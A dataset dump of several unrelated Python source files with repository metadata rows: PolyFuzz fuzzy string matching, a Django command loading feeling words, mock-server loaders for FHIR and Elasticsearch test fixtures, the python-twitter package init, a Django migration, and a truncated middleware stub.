        self.assertFalse(self._tx(msg), f"transmit of {addr=:#x} {bus=} from {test_name} was allowed")
| 38.329966 | 126 | 0.719694 |
79546d810875686045146318d03c82890be863e2 | 13,024 | py | Python | polyfuzz/polyfuzz.py | darkravager/PolyFuzz | 05485dcd81f60cfe2eb2538a72b96b62405170b2 | [
"MIT"
] | 445 | 2020-11-28T07:49:00.000Z | 2022-03-27T17:54:50.000Z | polyfuzz/polyfuzz.py | darkravager/PolyFuzz | 05485dcd81f60cfe2eb2538a72b96b62405170b2 | [
"MIT"
] | 24 | 2020-12-06T19:16:18.000Z | 2022-03-29T09:51:38.000Z | polyfuzz/polyfuzz.py | darkravager/PolyFuzz | 05485dcd81f60cfe2eb2538a72b96b62405170b2 | [
"MIT"
] | 42 | 2020-12-01T06:33:07.000Z | 2022-02-27T16:02:54.000Z | import logging
import pandas as pd
from typing import List, Mapping, Union, Iterable
from polyfuzz.linkage import single_linkage
from polyfuzz.utils import check_matches, check_grouped, create_logger
from polyfuzz.models import TFIDF, RapidFuzz, Embeddings, BaseMatcher
from polyfuzz.metrics import precision_recall_curve, visualize_precision_recall
logger = create_logger()
class PolyFuzz:
    """
    PolyFuzz class for Fuzzy string matching, grouping, and evaluation.
    Arguments:
        method: the method(s) used for matching. For quick selection of models
                select one of the following: "EditDistance", "TF-IDF" or "Embeddings".
                If you want more control over the models above, pass
                in a model from polyfuzz.models. For examples, see
                usage below.
        verbose: Changes the verbosity of the model, Set to True if you want
                 to track the stages of the model.
    Usage:
    For basic, out-of-the-box usage, run the code below. You can replace "TF-IDF"
    with either "EditDistance" or "Embeddings" for quick access to these models:
    ```python
    import polyfuzz as pf
    model = pf.PolyFuzz("TF-IDF")
    ```
    If you want more control over the String Matching models, you can load
    in these models separately:
    ```python
    tfidf = TFIDF(n_gram_range=(3, 3), min_similarity=0, model_id="TF-IDF-Sklearn")
    model = pf.PolyFuzz(tfidf)
    ```
    You can also select multiple models in order to compare performance:
    ```python
    tfidf = TFIDF(n_gram_range=(3, 3), min_similarity=0, model_id="TF-IDF-Sklearn")
    edit = EditDistance(n_jobs=-1)
    model = pf.PolyFuzz([tfidf, edit])
    ```
    To use embedding models, please use Flair word embeddings:
    ```python
    from flair.embeddings import WordEmbeddings, TransformerWordEmbeddings
    fasttext_embedding = WordEmbeddings('news')
    bert_embedding = TransformerWordEmbeddings('bert-base-multilingual-cased')
    embedding = Embeddings([fasttext_embedding, bert_embedding ], min_similarity=0.0)
    model = pf.PolyFuzz(embedding)
    ```
    """
    def __init__(self,
                 method: Union[str,
                               BaseMatcher,
                               List[BaseMatcher]] = "TF-IDF",
                 verbose: bool = False):
        self.method = method
        self.matches = None
        # Metrics
        self.min_precisions = None
        self.recalls = None
        self.average_precisions = None
        # Cluster
        self.clusters = None
        self.cluster_mappings = None
        self.grouped_matches = None
        if verbose:
            logger.setLevel(logging.DEBUG)
        else:
            logger.setLevel(logging.WARNING)

    def match(self,
              from_list: List[str],
              to_list: List[str],
              top_n: int = 1):
        """ Match the from_list of strings to the to_list of strings with whatever models
        you have initialized
        Arguments:
            from_list: The list from which you want mappings
            to_list: The list where you want to map to
            top_n: The number of matches you want returned. This is currently only implemented
                   for `polyfuzz.models.TFIDF` and `polyfuzz.models.Embeddings` as they
                   can computationally handle more comparisons.
        Updates:
            self.matches: A dictionary with the matches from all models, can
                          be accessed with `model.get_all_matches` or
                          `model.get_match("TF-IDF")`
        Usage:
        After having initialized your models, you can pass through lists of strings:
        ```python
        import polyfuzz as pf
        model = pf.PolyFuzz("TF-IDF", model_id="TF-IDF")
        model.match(from_list = ["string_one", "string_two"],
                    to_list = ["string_three", "string_four"])
        ```
        You can access the results matches with `model.get_all_matches` or a specific
        model with `model.get_match("TF-IDF")` based on their model_id.
        """
        # Standard models - quick access
        if isinstance(self.method, str):
            if self.method in ["TF-IDF", "TFIDF"]:
                self.matches = {"TF-IDF": TFIDF(min_similarity=0, top_n=top_n).match(from_list, to_list)}
            elif self.method in ["EditDistance", "Edit Distance"]:
                self.matches = {"EditDistance": RapidFuzz().match(from_list, to_list)}
            elif self.method in ["Embeddings", "Embedding"]:
                self.matches = {"Embeddings": Embeddings(min_similarity=0, top_n=top_n).match(from_list, to_list)}
            else:
                raise ValueError("Please instantiate the model with one of the following methods: \n"
                                 "* 'TF-IDF'\n"
                                 "* 'EditDistance'\n"
                                 "* 'Embeddings'\n")
            logger.info(f"Ran model with model id = {self.method}")
        # Custom models
        elif isinstance(self.method, BaseMatcher):
            self.matches = {self.method.model_id: self.method.match(from_list, to_list)}
            # NOTE: use the module-level `logger` (not the root logger) so the
            # `verbose` flag set in __init__ actually controls this output
            logger.info(f"Ran model with model id = {self.method.model_id}")
        # Multiple custom models
        elif isinstance(self.method, Iterable):
            self._update_model_ids()
            self.matches = {}
            for model in self.method:
                self.matches[model.model_id] = model.match(from_list, to_list)
                logger.info(f"Ran model with model id = {model.model_id}")
        return self

    def visualize_precision_recall(self,
                                   kde: bool = False,
                                   save_path: str = None
                                   ):
        """ Calculate and visualize precision-recall curves
        A minimum similarity score might be used to identify
        when a match could be considered to be correct. For example,
        we can assume that if a similarity score pass 0.95 we are
        quite confident that the matches are correct. This minimum
        similarity score can be defined as **precision** since it shows
        you how precise we believe the matches are at a minimum.
        **Recall** can then be defined as as the percentage of matches
        found at a certain minimum similarity score. A high recall means
        that for a certain minimum precision score, we find many matches.
        Arguments:
            kde: whether to also visualize the kde plot
            save_path: the path to save the resulting image to
        Usage:
        ```python
        import polyfuzz as pf
        model = pf.PolyFuzz("TF-IDF", model_id="TF-IDF")
        model.match(from_list = ["string_one", "string_two"],
                    to_list = ["string_three", "string_four"])
        model.visualize_precision_recall(save_path="results.png")
        ```
        """
        check_matches(self)
        self.min_precisions = {}
        self.recalls = {}
        self.average_precisions = {}
        for name, match in self.matches.items():
            min_precision, recall, average_precision = precision_recall_curve(match)
            self.min_precisions[name] = min_precision
            self.recalls[name] = recall
            self.average_precisions[name] = average_precision
        visualize_precision_recall(self.matches, self.min_precisions, self.recalls, kde, save_path)

    def group(self,
              model: Union[str, BaseMatcher] = None,
              link_min_similarity: float = 0.75,
              group_all_strings: bool = False):
        """ From the matches, group the `To` matches together using single linkage
        Arguments:
            model: you can choose one of the models in `polyfuzz.models` to be used as a grouper
            link_min_similarity: the minimum similarity between strings before they are grouped
                                 in a single linkage fashion
            group_all_strings: if you want to compare a list of strings with itself and then cluster
                               those strings, set this to True. Otherwise, only the strings that
                               were mapped To are clustered.
        Updates:
            self.matches: Adds a column `Group` that is the grouped version of the `To` column
        """
        check_matches(self)
        self.clusters = {}
        self.cluster_mappings = {}
        # Standard models - quick access
        if isinstance(model, str):
            # BUG FIX: the elif branches previously tested `self.method` (the
            # constructor argument) instead of the `model` argument, so passing
            # model="EditDistance" or model="Embeddings" here never worked
            # unless the constructor happened to use the same string.
            if model in ["TF-IDF", "TFIDF"]:
                model = TFIDF(n_gram_range=(3, 3), min_similarity=link_min_similarity)
            elif model in ["EditDistance", "Edit Distance"]:
                model = RapidFuzz()
            elif model in ["Embeddings", "Embedding"]:
                model = Embeddings(min_similarity=link_min_similarity)
            else:
                raise ValueError("Please instantiate the model with one of the following methods: \n"
                                 "* 'TF-IDF'\n"
                                 "* 'EditDistance'\n"
                                 "* 'Embeddings'\n"
                                 "* Or None if you want to automatically use TF-IDF")
        # Use TF-IDF if no model is specified
        elif not model:
            model = TFIDF(n_gram_range=(3, 3), min_similarity=link_min_similarity)
        # Group per model
        for name, match in self.matches.items():
            self._create_groups(name, model, link_min_similarity, group_all_strings)

    def get_ids(self) -> Union[str, List[str], None]:
        """ Get all model ids for easier access """
        check_matches(self)
        if isinstance(self.method, str):
            return self.method
        elif isinstance(self.method, Iterable):
            return [model.model_id for model in self.method]
        return None

    def get_matches(self, model_id: str = None) -> Union[pd.DataFrame,
                                                         Mapping[str, pd.DataFrame]]:
        """ Get the matches from one or more models"""
        check_matches(self)
        if len(self.matches) == 1:
            return list(self.matches.values())[0]
        elif len(self.matches) > 1 and model_id:
            return self.matches[model_id]
        return self.matches

    def get_clusters(self, model_id: str = None) -> Mapping[str, List[str]]:
        """ Get the groupings/clusters from a single model
        Arguments:
            model_id: the model id of the model if you have specified multiple models
        """
        check_matches(self)
        check_grouped(self)
        if len(self.matches) == 1:
            return list(self.clusters.values())[0]
        elif len(self.matches) > 1 and model_id:
            return self.clusters[model_id]
        return self.clusters

    def get_cluster_mappings(self, name: str = None) -> Mapping[str, int]:
        """ Get the mappings from the `To` column to its respective column """
        check_matches(self)
        check_grouped(self)
        if len(self.matches) == 1:
            return list(self.cluster_mappings.values())[0]
        elif len(self.matches) > 1 and name:
            return self.cluster_mappings[name]
        return self.cluster_mappings

    def _create_groups(self,
                       name: str,
                       model: BaseMatcher,
                       link_min_similarity: float,
                       group_all_strings: bool):
        """ Create groups based on either the To mappings if you compare two different lists of strings, or
        the From mappings if you compare lists of strings that are equal (set group_all_strings to True)
        """
        if group_all_strings:
            strings = list(self.matches[name].From.dropna().unique())
        else:
            strings = list(self.matches[name].To.dropna().unique())
        # Create clusters
        matches = model.match(strings, strings)
        clusters, cluster_id_map, cluster_name_map = single_linkage(matches, link_min_similarity)
        # Map the `to` list to groups
        df = self.matches[name]
        df["Group"] = df['To'].map(cluster_name_map).fillna(df['To'])
        self.matches[name] = df
        # Track clusters and their ids
        self.clusters[name] = clusters
        self.cluster_mappings[name] = cluster_id_map

    def _update_model_ids(self):
        """ Update model ids such that there is no overlap between ids """
        # Give models a model_id if it didn't already exist
        for index, model in enumerate(self.method):
            if not model.model_id:
                model.model_id = f"Model {index}"
        # Update duplicate names
        model_ids = [model.model_id for model in self.method]
        if len(set(model_ids)) != len(model_ids):
            for index, model in enumerate(self.method):
                model.model_id = f"Model {index}"
| 39.347432 | 114 | 0.598741 |
79546e16ca277d9150931a586f3b32b499e96abb | 3,058 | py | Python | twitter_feels/apps/thermometer/management/commands/load_feelings.py | michaelbrooks/twitter-feels | 51dc00478f05841f3726edf5f7da7e0a46ae66e8 | [
"MIT"
] | 1 | 2017-02-15T10:55:26.000Z | 2017-02-15T10:55:26.000Z | twitter_feels/apps/thermometer/management/commands/load_feelings.py | michaelbrooks/twitter-feels | 51dc00478f05841f3726edf5f7da7e0a46ae66e8 | [
"MIT"
] | null | null | null | twitter_feels/apps/thermometer/management/commands/load_feelings.py | michaelbrooks/twitter-feels | 51dc00478f05841f3726edf5f7da7e0a46ae66e8 | [
"MIT"
] | null | null | null | import logging
from logging.config import dictConfig
from os import path
from optparse import make_option
import csv
from django.core.management.base import BaseCommand
from datetime import timedelta
from django.utils import timezone
from ...models import FeelingWord
# Setup logging if not already configured.
# Attaches a DEBUG-level StreamHandler to the 'thermometer' logger exactly once
# (skipped if some other configuration already gave it handlers).
logger = logging.getLogger('thermometer')
if not logger.handlers:
    dictConfig({
        "version": 1,
        "disable_existing_loggers": False,
        "handlers": {
            "thermometer": {
                "level": "DEBUG",
                "class": "logging.StreamHandler",
            },
        },
        # BUG FIX: the logger configuration must live under the "loggers" key.
        # It was previously a top-level "thermometer" key, which dictConfig
        # silently ignores, so the handler was never attached and the DEBUG
        # level was never applied.
        "loggers": {
            "thermometer": {
                "handlers": ["thermometer"],
                "level": "DEBUG",
            },
        },
    })
class Command(BaseCommand):
    """
    Loads feelings from a feelings file into the database.
    """
    # optparse-style options (legacy Django option handling via option_list)
    option_list = BaseCommand.option_list + (
        make_option(
            '--force',
            action='store_true',
            dest='force',
            default=False,
            help='Ignore existing feelings and insert anyway.'
        ),
        make_option(
            '--delimiter',
            action='store',
            dest='delimiter',
            default='\t',
            help='Delimiter for parsing the feelings file.'
        ),
        make_option(
            '--limit',
            action='store',
            dest='limit',
            default=None,
            type=int,
            help='Just load the first <limit> feelings from the file.'
        ),
    )
    args = '<feelings.txt>'
    help = "Parses the feelings file from We Feel Fine and adds feelings to the database."
    def handle(self, feelings_filename=None, *args, **options):
        """Parse the feelings file and bulk-insert FeelingWord rows.

        Defaults to the bundled feelings.txt next to this module when no
        filename is given. Refuses to run if FeelingWords already exist,
        unless --force is passed.
        """
        try:
            force = options.get('force', False)
            delimiter = options.get('delimiter', '\t')
            limit = options.get('limit', None)
            if not feelings_filename:
                # fall back to the feelings.txt shipped alongside this command
                feelings_filename = path.join(path.dirname(__file__), 'feelings.txt')
            existing = FeelingWord.objects.count()
            if existing and not force:
                logger.error("Your database already contains %d FeelingWords! Use --force to ignore.", existing)
                return False
            logger.info("Loading feelings from %s...", feelings_filename)
            # parse the feelings file
            with open(feelings_filename, 'rb') as feelings_file:
                reader = csv.reader(feelings_file, delimiter=delimiter)
                next(reader, None)  # skip the header
                feelings = []
                for row in reader:
                    word = row[0]
                    # NOTE(review): count (row[1]) is read but never used —
                    # FeelingWord is built from word and color only.
                    count = row[1]
                    color = row[2]
                    feelings.append(FeelingWord(word=word, color=color))
                    if limit and len(feelings) == limit:
                        break
            # single bulk insert instead of one query per row
            FeelingWord.objects.bulk_create(feelings)
            logger.info("Created %d feelings", len(feelings))
        except Exception as e:
            # NOTE(review): this swallows all errors after logging them, so the
            # command exits "successfully" even on failure — confirm intended.
            logger.error(e)
| 28.849057 | 112 | 0.545782 |
79546e2ce4f2528149b0ab925e5a431520c06bcf | 12,083 | py | Python | spark_pipeline_framework_testing/tests_common/mock_requests_loader.py | icanbwell/SparkPipelineFramework.Testing | 6dc83fe7afa77aa4107ddb40b6920361460554dc | [
"Apache-2.0"
] | 1 | 2020-10-31T23:25:03.000Z | 2020-10-31T23:25:03.000Z | spark_pipeline_framework_testing/tests_common/mock_requests_loader.py | imranq2/SparkPipelineFramework.Testing | 6dc83fe7afa77aa4107ddb40b6920361460554dc | [
"Apache-2.0"
] | null | null | null | spark_pipeline_framework_testing/tests_common/mock_requests_loader.py | imranq2/SparkPipelineFramework.Testing | 6dc83fe7afa77aa4107ddb40b6920361460554dc | [
"Apache-2.0"
] | null | null | null | import json
import os
from glob import glob
from pathlib import Path
from typing import Dict, Any, List, Optional
from spark_pipeline_framework_testing.mockserver_client.mockserver_client import (
MockServerFriendlyClient,
request,
response,
times,
text_equals,
times_any,
json_equals,
)
def load_mock_fhir_requests_from_folder(
    folder: Path,
    mock_client: MockServerFriendlyClient,
    method: str = "POST",
    relative_path: Optional[str] = None,
    query_string: Optional[Dict[str, str]] = None,
    url_prefix: Optional[str] = None,
    response_body: Optional[str] = None,
) -> List[str]:
    """
    Registers a mock expectation for every .json file found (recursively)
    under ``folder``.  A file containing a JSON array is expanded into one
    expectation per element, unless ``relative_path`` is supplied, in which
    case the array is mocked as a single payload.
    from https://pypi.org/project/mockserver-friendly-client/

    :param folder: root directory scanned recursively for .json files
    :param mock_client: client to mock server
    :param method: HTTP verb the expectation should match
    :param relative_path: explicit path to mock instead of deriving one
    :param query_string: query parameters the expectation should match
    :param query_string: query parameters the expectation should match
    :param url_prefix: prefix inserted before /4_0_0 in the mocked path
    :param response_body: canned response body
    :return: sorted list of file paths that were processed
    """
    json_files: List[str] = sorted(
        glob(str(folder.joinpath("**/*.json")), recursive=True)
    )
    for json_file in json_files:
        # parse the file once, then decide whether it is a batch or a single request
        with open(json_file, "r") as handle:
            parsed = json.loads(handle.read())
        is_batch = isinstance(parsed, list) and not relative_path
        pending_requests = parsed if is_batch else [parsed]
        for single_request in pending_requests:
            mock_single_request(
                fhir_request=single_request,
                method=method,
                mock_client=mock_client,
                relative_path=relative_path,
                query_string=query_string,
                url_prefix=url_prefix,
                response_body=response_body,
            )
    return json_files
def mock_single_request(
    fhir_request: Dict[str, Any],
    method: str,
    mock_client: MockServerFriendlyClient,
    relative_path: Optional[str],
    query_string: Optional[Dict[str, str]],
    url_prefix: Optional[str],
    response_body: Optional[str],
) -> None:
    """Register one mock-server expectation for a single FHIR request.

    POST requests are mocked as $merge calls (matched any number of times,
    responding with a canned merge result); GET requests are mocked once,
    either at a path derived from the resource's type/id or at the given
    relative_path.

    NOTE(review): response_body is accepted but never used in this function —
    confirm whether the POST payload should honor it.
    """
    # find id and resourceType
    if method == "POST":
        # id_ = fhir_request["id"]
        # noinspection PyPep8Naming
        resourceType = fhir_request["resourceType"]
        id_ = fhir_request["id"]
        path = (
            f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/1/$merge"
        )
        # canned $merge response reporting the resource as newly created
        payload: str = json.dumps([{"id": id_, "updated": False, "created": True}])
        mock_client.expect(
            request(
                method="POST",
                path=path,
                body=json_equals([fhir_request]),
            ),
            response(body=payload),
            # POST expectations match any number of calls
            timing=times_any(),
        )
        print(f"Mocking: POST {mock_client.base_url}{path}: {json.dumps(fhir_request)}")
    else:
        if not relative_path:
            # derive the GET path from the resource's own type and id
            id_ = fhir_request["id"]
            # noinspection PyPep8Naming
            resourceType = fhir_request["resourceType"]
            path = (
                f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/{id_}"
            )
            mock_client.expect(
                request(method="GET", path=path, querystring=query_string),
                response(body=json.dumps(fhir_request)),
                timing=times(1),
            )
        else:
            # caller supplied an explicit relative path to mock
            path = f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{relative_path}"
            mock_client.expect(
                request(method="GET", path=path, querystring=query_string),
                response(body=json.dumps(fhir_request)),
                timing=times(1),
            )
        print(f"Mocking: GET {mock_client.base_url}{path}{query_string or ''}")
# noinspection PyPep8Naming
def load_mock_fhir_everything_requests_from_folder(
    folder: Path,
    mock_client: MockServerFriendlyClient,
    resourceType: str,
    url_prefix: Optional[str] = None,
) -> List[str]:
    """
    Mocks a $everything GET endpoint for every resource .json file found
    (recursively) under ``folder``; each expectation matches exactly once and
    responds with the file's contents.
    from https://pypi.org/project/mockserver-friendly-client/

    :param folder: directory searched recursively for .json files
    :param mock_client: client to mock server
    :param resourceType: FHIR resource type used to build the mocked path
    :param url_prefix: prefix inserted before /4_0_0 in the mocked path
    :return: list of file paths that were processed
    """
    files: List[str] = glob(str(folder.joinpath("**/*.json")), recursive=True)
    prefix = ("/" + url_prefix) if url_prefix else ""
    for file_name in files:
        # read the resource and register a one-shot GET expectation for it
        with open(file_name, "r") as file:
            resource: Dict[str, Any] = json.loads(file.read())
        resource_id: str = resource["id"]
        path = f"{prefix}/4_0_0/{resourceType}/{resource_id}/$everything"
        mock_client.expect(
            request(
                method="GET",
                path=path,
            ),
            response(body=json.dumps(resource)),
            timing=times(1),
        )
        print(f"Mocking: GET {mock_client.base_url}{path}")
    return files
# noinspection PyPep8Naming
def load_mock_fhir_everything_batch_requests_from_folder(
    folder: Path,
    mock_client: MockServerFriendlyClient,
    resourceType: str,
    ids: List[str],
    url_prefix: Optional[str] = None,
) -> List[str]:
    """
    Collects, from every bundle .json file under ``folder``, the entries whose
    resource id is in ``ids``, assembles them into one FHIR collection Bundle,
    and mocks a single batched $everything GET endpoint returning that bundle.
    from https://pypi.org/project/mockserver-friendly-client/

    :param folder: directory searched recursively for .json files
    :param mock_client: client to mock server
    :param resourceType: FHIR resource type used to build the mocked path
    :param ids: resource ids to include in this batch
    :param url_prefix: prefix inserted before /4_0_0 in the mocked path
    :return: list of file paths that were scanned
    """
    files: List[str] = glob(str(folder.joinpath("**/*.json")), recursive=True)
    matched_entries: List[Dict[str, Any]] = []
    print(f"mock fhir batch request for {ids}")
    for file_name in files:
        with open(file_name, "r") as file:
            fhir_bundle: Dict[str, Any] = json.loads(file.read())
        if "entry" not in fhir_bundle:
            print(f"{file_name} has no entry property!")
            continue
        # keep only the entries whose resource id was requested
        matched_entries.extend(
            entry
            for entry in fhir_bundle["entry"]
            if entry.get("resource", {}).get("id", "") in ids
        )
    result_bundle: Dict[str, Any] = {
        "resourceType": "Bundle",
        "id": "bundle-example",
        "type": "collection",
        "entry": matched_entries,
    }
    # find id and resourceType
    path = (
        f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/$everything"
    )
    mock_client.expect(
        request(method="GET", path=path, querystring={"id": ",".join(ids)}),
        response(body=json.dumps(result_bundle)),
        timing=times(1),
    )
    print(f"Mocking: GET {mock_client.base_url}{path}")
    return files
def load_mock_elasticsearch_requests_from_folder(
    folder: Path, mock_client: MockServerFriendlyClient, index: str
) -> List[str]:
    """
    Loads all .json files from the folder and its sub-folders and mocks an
    ElasticSearch bulk-indexing POST for each one.

    from https://pypi.org/project/mockserver-friendly-client/

    :param folder: where to look for .json files (recursively)
    :param mock_client: mock server client to register expectations on
    :param index: ElasticSearch index name used in the /{index}/_bulk path
    :return: list of the file paths that were mocked
    """
    file_name: str
    files: List[str] = glob(str(folder.joinpath("**/*.json")), recursive=True)
    for file_name in files:
        # load file as json
        with open(file_name, "r") as file:
            lines: List[str] = file.readlines()
            # Re-serialize every non-blank line so the expected body matches
            # canonical json.dumps output regardless of how the fixture file
            # was formatted (the bulk API body is newline-delimited JSON).
            http_request: str = "\n".join(
                [
                    (json.dumps(json.loads(line))) if line != "\n" else ""
                    for line in lines
                ]
            )
            # noinspection PyPep8Naming
            path = f"/{index}/_bulk"
            # noinspection SpellCheckingInspection
            # The canned response reports two documents "created"; callers
            # only need a well-formed, error-free bulk reply.
            mock_client.expect(
                request(
                    method="POST",
                    path=path,
                    body=text_equals(http_request),
                ),
                response(
                    headers={"Content-Type": "application/json"},
                    body=f"""
                    {{
                        "took": 194,
                        "errors": false,
                        "items": [
                            {{
                                "index": {{
                                    "_index": "{index}",
                                    "_type": "_doc",
                                    "_id": "TESQ93YBW4SQ_M9deEJw",
                                    "_version": 1,
                                    "result": "created"
                                }}
                            }},
                            {{
                                "index": {{
                                    "_index": "{index}",
                                    "_type": "_doc",
                                    "_id": "TUSQ93YBW4SQ_M9deEJw",
                                    "_version": 1,
                                    "result": "created"
                                }}
                            }}
                        ]
                    }}""",
                ),
                timing=times(1),
            )
            print(f"Mocking: POST {mock_client.base_url}{path}")
    return files
def load_mock_source_api_responses_from_folder(
    folder: Path, mock_client: MockServerFriendlyClient, url_prefix: Optional[str]
) -> List[str]:
    """
    Registers a mock GET response for every file found (recursively) under
    the given folder; the mocked path is the file's base name.

    from https://pypi.org/project/mockserver-friendly-client/

    :param folder: where to look for files (recursively)
    :param mock_client: mock server client to register expectations on
    :param url_prefix: optional prefix inserted before the file name
    :return: sorted list of the file paths that were mocked
    """
    prefix_segment = ('/' + url_prefix) if url_prefix else ''
    files: List[str] = sorted(glob(str(folder.joinpath("**/*")), recursive=True))
    for file_path in files:
        with open(file_path, "r") as source_file:
            content = source_file.read()
        path = f"{prefix_segment}/{os.path.basename(file_path)}"
        mock_client.expect(
            request(method="GET", path=path),
            response(body=content),
            timing=times(1),
        )
        print(f"Mocking: GET {mock_client.base_url}{path}")
    return files
def load_mock_source_api_json_responses(
    folder: Path,
    mock_client: MockServerFriendlyClient,
    url_prefix: Optional[str],
    add_file_name: Optional[bool] = False,
    url_suffix: Optional[str] = None,
) -> List[str]:
    """
    Mock responses for all files from the folder and its sub-folders.

    Each .json file must contain a "request_parameters" key (kwargs for the
    mocked request) and a "request_result" key (the JSON body to return).

    :param folder: where to look for files (recursively)
    :param mock_client: mock server client to register expectations on
    :param url_prefix: http://{mock_server_url}/{url_prefix}...
    :param add_file_name: http://{mock_server_url}/{url_prefix}/{add_file_name}...
    :param url_suffix: http://{mock_server_url}/{url_prefix}/{add_file_name}/{url_suffix}?
    :return: sorted list of the file paths that were mocked
    """
    file_path: str
    files: List[str] = sorted(glob(str(folder.joinpath("**/*.json")), recursive=True))
    for file_path in files:
        file_name = os.path.basename(file_path)
        with open(file_path, "r") as file:
            content = json.loads(file.read())
            # BUG FIX: a missing dict key raises KeyError, not ValueError, so
            # these friendly errors were previously unreachable.
            try:
                request_parameters = content["request_parameters"]
            except KeyError:
                raise Exception(
                    "`request_parameters` key not found! It is supposed to contain parameters of the request function."
                )
            path = f"{('/' + url_prefix) if url_prefix else ''}"
            path = f"{path}/{os.path.splitext(file_name)[0]}" if add_file_name else path
            if url_suffix:
                path = f"{path}/{url_suffix}"
            try:
                request_result = content["request_result"]
            except KeyError:
                raise Exception(
                    "`request_result` key not found. It is supposed to contain the expected result of the request function."
                )
            mock_client.expect(
                request(path=path, **request_parameters),
                response(body=json.dumps(request_result)),
                timing=times(1),
            )
            print(f"Mocking {mock_client.base_url}{path}: {request_parameters}")
    return files
| 33.751397 | 123 | 0.564347 |
79546ed1ce17d21396da8e001c3f407a17bde91e | 867 | py | Python | functions/utils.py | muellermax/nlp-disaster-app | bd9af53cb7ae6b2064abdd4843d8d2556ccd523b | [
"Unlicense"
] | null | null | null | functions/utils.py | muellermax/nlp-disaster-app | bd9af53cb7ae6b2064abdd4843d8d2556ccd523b | [
"Unlicense"
] | null | null | null | functions/utils.py | muellermax/nlp-disaster-app | bd9af53cb7ae6b2064abdd4843d8d2556ccd523b | [
"Unlicense"
] | null | null | null | # This module was necessary as after deployment to Heroku the tokenize function could not be found.
# So train_classifier and run both access this file.
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import nltk
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('stopwords')
import pickle
def tokenize(text):
"""
Function to tokenize and lemmatize a given text.
:param text: String that has to be tokenized and lemmatized.
:return: List of tokenized words.
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
if tok not in stopwords.words('english'):
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
| 27.09375 | 100 | 0.71857 |
79546f2244899e41c39dd91e4f9a393cd95f43ba | 2,188 | py | Python | twitter/__init__.py | NadiaFida/python-twitter | e62f974fabf28a65eb0094a7fe5324d7ff83308c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | twitter/__init__.py | NadiaFida/python-twitter | e62f974fabf28a65eb0094a7fe5324d7ff83308c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | twitter/__init__.py | NadiaFida/python-twitter | e62f974fabf28a65eb0094a7fe5324d7ff83308c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2007-2018 The Python-Twitter Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library that provides a Python interface to the Twitter API."""
from __future__ import absolute_import
# Package distribution metadata for python-twitter.
__author__ = 'The Python-Twitter Developers'
__email__ = 'python-twitter@googlegroups.com'
__copyright__ = 'Copyright (c) 2007-2016 The Python-Twitter Developers'
__license__ = 'Apache License 2.0'
__version__ = '3.5'
__url__ = 'https://github.com/bear/python-twitter'
__download_url__ = 'https://pypi.python.org/pypi/python-twitter'
__description__ = 'A Python wrapper around the Twitter API'
import json # noqa
try:
from hashlib import md5 # noqa
except ImportError:
from md5 import md5 # noqa
from ._file_cache import _FileCache # noqa
from .error import TwitterError # noqa
from .parse_tweet import ParseTweet # noqa
from .models import ( # noqa
Category, # noqa
DirectMessage, # noqa
Hashtag, # noqa
List, # noqa
Media, # noqa
Place, # noga
Trend, # noqa
Url, # noqa
User, # noqa
UserStatus, # noqa
Status # noqa
)
from .api import Api # noqa
| 38.385965 | 74 | 0.552559 |
79546f367c679fe0a212c9561942dcaa6fab1f35 | 852 | py | Python | home/migrations/0019_auto_20210204_1139.py | rachelhs/wagtail-starter | 2363517fd91e279d564ff899dfa3cdfd7ec01aa9 | [
"MIT"
] | null | null | null | home/migrations/0019_auto_20210204_1139.py | rachelhs/wagtail-starter | 2363517fd91e279d564ff899dfa3cdfd7ec01aa9 | [
"MIT"
] | null | null | null | home/migrations/0019_auto_20210204_1139.py | rachelhs/wagtail-starter | 2363517fd91e279d564ff899dfa3cdfd7ec01aa9 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-02-04 11:39
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtailstreamforms.blocks
class Migration(migrations.Migration):
    # Auto-generated by Django (see header comment); avoid hand-editing the
    # schema operations so migration state stays consistent with the models.

    dependencies = [
        ('home', '0018_auto_20210204_1138'),
    ]

    operations = [
        # Redefine HomePage.contact_body as a StreamField with a single
        # 'form' StructBlock (wagtailstreamforms chooser, action, reference).
        migrations.AlterField(
            model_name='homepage',
            name='contact_body',
            field=wagtail.core.fields.StreamField([('form', wagtail.core.blocks.StructBlock([('form', wagtailstreamforms.blocks.FormChooserBlock()), ('form_action', wagtail.core.blocks.CharBlock(help_text='The form post action. "" or "." for the current page or a url', required=False)), ('form_reference', wagtailstreamforms.blocks.InfoBlock(help_text='This form will be given a unique reference once saved', required=False))]))]),
        ),
    ]
| 38.727273 | 432 | 0.700704 |
79546f779a2b4576ff5738ea5ceda70c191bd67c | 390 | py | Python | flags/middleware.py | mdunc/django-flags | 7fdb7a67da25df197f53df4bfa06c8e5175944a3 | [
"CC0-1.0"
] | 142 | 2018-07-27T15:38:13.000Z | 2022-03-19T19:09:44.000Z | flags/middleware.py | mdunc/django-flags | 7fdb7a67da25df197f53df4bfa06c8e5175944a3 | [
"CC0-1.0"
] | 64 | 2018-06-25T14:21:35.000Z | 2022-03-14T17:42:18.000Z | flags/middleware.py | mdunc/django-flags | 7fdb7a67da25df197f53df4bfa06c8e5175944a3 | [
"CC0-1.0"
] | 24 | 2018-10-09T20:05:36.000Z | 2022-03-29T16:34:30.000Z | import warnings
from django.core.exceptions import MiddlewareNotUsed
class FlagConditionsMiddleware:
    """Deprecated no-op middleware kept only so existing settings that still
